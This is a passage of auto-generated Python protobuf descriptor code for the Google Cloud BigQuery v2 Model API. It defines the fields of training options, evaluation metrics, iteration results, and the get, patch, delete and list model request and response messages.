has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="multi_class_classification_metrics",
full_name="google.cloud.bigquery.v2.Model.EvaluationMetrics.multi_class_classification_metrics",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="clustering_metrics",
full_name="google.cloud.bigquery.v2.Model.EvaluationMetrics.clustering_metrics",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="metrics",
full_name="google.cloud.bigquery.v2.Model.EvaluationMetrics.metrics",
index=0,
containing_type=None,
fields=[],
)
],
serialized_start=3160,
serialized_end=3565,
)
_MODEL_TRAININGRUN_TRAININGOPTIONS_LABELCLASSWEIGHTSENTRY = _descriptor.Descriptor(
name="LabelClassWeightsEntry",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.LabelClassWeightsEntry",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="key",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.LabelClassWeightsEntry.key",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="value",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.LabelClassWeightsEntry.value",
index=1,
number=2,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=_b("8\001"),
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=4853,
serialized_end=4909,
)
_MODEL_TRAININGRUN_TRAININGOPTIONS = _descriptor.Descriptor(
name="TrainingOptions",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="max_iterations",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.max_iterations",
index=0,
number=1,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="loss_type",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.loss_type",
index=1,
number=2,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="learn_rate",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.learn_rate",
index=2,
number=3,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="l1_regularization",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.l1_regularization",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="l2_regularization",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.l2_regularization",
index=4,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="min_relative_progress",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.min_relative_progress",
index=5,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="warm_start",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.warm_start",
index=6,
number=7,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="early_stop",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.early_stop",
index=7,
number=8,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="input_label_columns",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.input_label_columns",
index=8,
number=9,
type=9,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="data_split_method",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.data_split_method",
index=9,
number=10,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="data_split_eval_fraction",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.data_split_eval_fraction",
index=10,
number=11,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="data_split_column",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.data_split_column",
index=11,
number=12,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="learn_rate_strategy",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.learn_rate_strategy",
index=12,
number=13,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="initial_learn_rate",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.initial_learn_rate",
index=13,
number=16,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="label_class_weights",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.label_class_weights",
index=14,
number=17,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="distance_type",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.distance_type",
index=15,
number=20,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="num_clusters",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.num_clusters",
index=16,
number=21,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="model_uri",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.model_uri",
index=17,
number=22,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="optimization_strategy",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.optimization_strategy",
index=18,
number=23,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[_MODEL_TRAININGRUN_TRAININGOPTIONS_LABELCLASSWEIGHTSENTRY],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3876,
serialized_end=4909,
)
_MODEL_TRAININGRUN_ITERATIONRESULT_CLUSTERINFO = _descriptor.Descriptor(
name="ClusterInfo",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.IterationResult.ClusterInfo",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="centroid_id",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.IterationResult.ClusterInfo.centroid_id",
index=0,
number=1,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="cluster_radius",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.IterationResult.ClusterInfo.cluster_radius",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="cluster_size",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.IterationResult.ClusterInfo.cluster_size",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=5244,
serialized_end=5383,
)
_MODEL_TRAININGRUN_ITERATIONRESULT = _descriptor.Descriptor(
name="IterationResult",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.IterationResult",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="index",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.IterationResult.index",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="duration_ms",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.IterationResult.duration_ms",
index=1,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="training_loss",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.IterationResult.training_loss",
index=2,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="eval_loss",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.IterationResult.eval_loss",
index=3,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="learn_rate",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.IterationResult.learn_rate",
index=4,
number=7,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="cluster_infos",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.IterationResult.cluster_infos",
index=5,
number=8,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[_MODEL_TRAININGRUN_ITERATIONRESULT_CLUSTERINFO],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=4912,
serialized_end=5383,
)
_MODEL_TRAININGRUN = _descriptor.Descriptor(
name="TrainingRun",
full_name="google.cloud.bigquery.v2.Model.TrainingRun",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="training_options",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.training_options",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="start_time",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.start_time",
index=1,
number=8,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="results",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.results",
index=2,
number=6,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="evaluation_metrics",
full_name="google.cloud.bigquery.v2.Model.TrainingRun.evaluation_metrics",
index=3,
number=7,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[
_MODEL_TRAININGRUN_TRAININGOPTIONS,
_MODEL_TRAININGRUN_ITERATIONRESULT,
],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3568,
serialized_end=5383,
)
_MODEL_LABELSENTRY = _descriptor.Descriptor(
name="LabelsEntry",
full_name="google.cloud.bigquery.v2.Model.LabelsEntry",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="key",
full_name="google.cloud.bigquery.v2.Model.LabelsEntry.key",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="value",
full_name="google.cloud.bigquery.v2.Model.LabelsEntry.value",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=_b("8\001"),
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=5385,
serialized_end=5430,
)
_MODEL = _descriptor.Descriptor(
name="Model",
full_name="google.cloud.bigquery.v2.Model",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="etag",
full_name="google.cloud.bigquery.v2.Model.etag",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="model_reference",
full_name="google.cloud.bigquery.v2.Model.model_reference",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="creation_time",
full_name="google.cloud.bigquery.v2.Model.creation_time",
index=2,
number=5,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="last_modified_time",
full_name="google.cloud.bigquery.v2.Model.last_modified_time",
index=3,
number=6,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="description",
full_name="google.cloud.bigquery.v2.Model.description",
index=4,
number=12,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="friendly_name",
full_name="google.cloud.bigquery.v2.Model.friendly_name",
index=5,
number=14,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="labels",
full_name="google.cloud.bigquery.v2.Model.labels",
index=6,
number=15,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="expiration_time",
full_name="google.cloud.bigquery.v2.Model.expiration_time",
index=7,
number=16,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="location",
full_name="google.cloud.bigquery.v2.Model.location",
index=8,
number=13,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="model_type",
full_name="google.cloud.bigquery.v2.Model.model_type",
index=9,
number=7,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="training_runs",
full_name="google.cloud.bigquery.v2.Model.training_runs",
index=10,
number=9,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="feature_columns",
full_name="google.cloud.bigquery.v2.Model.feature_columns",
index=11,
number=10,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="label_columns",
full_name="google.cloud.bigquery.v2.Model.label_columns",
index=12,
number=11,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[
_MODEL_REGRESSIONMETRICS,
_MODEL_AGGREGATECLASSIFICATIONMETRICS,
_MODEL_BINARYCLASSIFICATIONMETRICS,
_MODEL_MULTICLASSCLASSIFICATIONMETRICS,
_MODEL_CLUSTERINGMETRICS,
_MODEL_EVALUATIONMETRICS,
_MODEL_TRAININGRUN,
_MODEL_LABELSENTRY,
],
enum_types=[
_MODEL_MODELTYPE,
_MODEL_LOSSTYPE,
_MODEL_DISTANCETYPE,
_MODEL_DATASPLITMETHOD,
_MODEL_LEARNRATESTRATEGY,
_MODEL_OPTIMIZATIONSTRATEGY,
],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=327,
serialized_end=6027,
)
_GETMODELREQUEST = _descriptor.Descriptor(
name="GetModelRequest",
full_name="google.cloud.bigquery.v2.GetModelRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="project_id",
full_name="google.cloud.bigquery.v2.GetModelRequest.project_id",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="dataset_id",
full_name="google.cloud.bigquery.v2.GetModelRequest.dataset_id",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="model_id",
full_name="google.cloud.bigquery.v2.GetModelRequest.model_id",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=6029,
serialized_end=6104,
)
_PATCHMODELREQUEST = _descriptor.Descriptor(
name="PatchModelRequest",
full_name="google.cloud.bigquery.v2.PatchModelRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="project_id",
full_name="google.cloud.bigquery.v2.PatchModelRequest.project_id",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="dataset_id",
full_name="google.cloud.bigquery.v2.PatchModelRequest.dataset_id",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="model_id",
full_name="google.cloud.bigquery.v2.PatchModelRequest.model_id",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="model",
full_name="google.cloud.bigquery.v2.PatchModelRequest.model",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=6106,
serialized_end=6231,
)
_DELETEMODELREQUEST = _descriptor.Descriptor(
name="DeleteModelRequest",
full_name="google.cloud.bigquery.v2.DeleteModelRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="project_id",
full_name="google.cloud.bigquery.v2.DeleteModelRequest.project_id",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="dataset_id",
full_name="google.cloud.bigquery.v2.DeleteModelRequest.dataset_id",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="model_id",
full_name="google.cloud.bigquery.v2.DeleteModelRequest.model_id",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=6233,
serialized_end=6311,
)
_LISTMODELSREQUEST = _descriptor.Descriptor(
name="ListModelsRequest",
full_name="google.cloud.bigquery.v2.ListModelsRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="project_id",
full_name="google.cloud.bigquery.v2.ListModelsRequest.project_id",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="dataset_id",
full_name="google.cloud.bigquery.v2.ListModelsRequest.dataset_id",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="max_results",
full_name="google.cloud.bigquery.v2.ListModelsRequest.max_results",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="page_token",
full_name="google.cloud.bigquery.v2.ListModelsRequest.page_token",
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=6314,
serialized_end=6444,
)
_LISTMODELSRESPONSE = _descriptor.Descriptor(
name="ListModelsResponse",
full_name="google.cloud.bigquery.v2.ListModelsResponse",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="models",
full_name="google.cloud.bigquery.v2.ListModelsResponse.models",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="next_page_token",
full_name="google.cloud.bigquery.v2.ListModelsResponse.next_page_token",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=6446,
serialized_end=6540,
)
_MODEL_REGRESSIONMETRICS.fields_by_name[
"mean_absolute_error"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_REGRESSIONMETRICS.fields_by_name[
"mean_squared_error"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_REGRESSIONMETRICS.fields_by_name[
"mean_squared_log_error"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
